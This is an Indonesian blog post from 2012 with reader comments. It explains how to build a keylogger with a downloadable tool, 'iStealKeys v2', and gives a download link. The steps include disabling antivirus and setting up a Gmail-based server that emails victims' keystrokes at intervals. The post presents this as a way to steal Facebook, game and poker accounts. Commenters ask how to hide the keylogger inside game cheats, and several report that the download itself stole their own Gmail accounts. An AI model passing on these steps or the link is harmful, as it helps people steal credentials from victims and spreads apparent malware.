Blogger Widgets

Senin, 28 Mei 2012

Cara Membuat KeyLogger, JANGAN DISALAH GUNAKAN


Cara Membuat Keylogger Buat para Hacker ( otomatis mengirim ke email ) MEMBUAT KEYLOGGER Tool :
 - Bahan Download disini www.ziddu.com/download/018395749/iStealKeysv2.rar.html

Tutorial :
 - Matikan Antivirus anda..
 - Ekstrak Folder iStealKeys v2
 - jalankan iSteal Keys v2
 - Sending Interval ( Minutes ) 10 menit aja terus klik Test SMTP tunggu ada pesan Test Valid anda klik OK
 - klik Generate
 - terus klik Build Server...
 - Happy hacker

 NB : harus memakain Gmail.. kalau agan ragu bisa bikin baru Account Gmail khusus Keylogger : dan komputer anda harus terinstal Microsoft .Net framework 4   Anda bisa mendapatkan Chip Poker, id facebook, id game online, DLL.. burhan gopur

11 komentar:

  1. bisa upload di mediafire gan??? ak coba download di ziddu tpi error gan :(

    BalasHapus
  2. gan bisa gk buatin gua .. or ajarin cara memasukan keylogre ke cheat gitu .. trus ke gmail saya .. jadi kalau orang mau download cheat kita .. char yang masuk ke gmail kita gitu .. ???

    BalasHapus
  3. download microsoft net frameworknya dimana ? gua butuh ni buat temen gua yang juga tukang hacker yang udah hack ID game gua

    BalasHapus
  4. kyk mn gan pas di adfly nya link nya dari mn tu , gw kan pke google site

    BalasHapus
  5. gan gimana cara bacanya di email?gak ada password sama sekali

    BalasHapus
  6. cara matiin antivirus nya gimana ga ngerti di sini ada nya ATI

    BalasHapus
  7. ajarin saya dong add fb ane aditya febrianto gannie

    BalasHapus
  8. Ahh monyet lu kira gue begok itu bukan cara buat keyyloger tp loh nyuru gue masuk ke keyyloger loh ..hahahaha NYIMAK ente .. jgn mw dowload woy tar loh yg kena keyylogger dari dia .. HATi hati modus ni orang !!!

    BalasHapus
  9. Dasar bnagsat malah akun gmail sy yg di Hack

    BalasHapus





Copyright © 2011 Template Doctor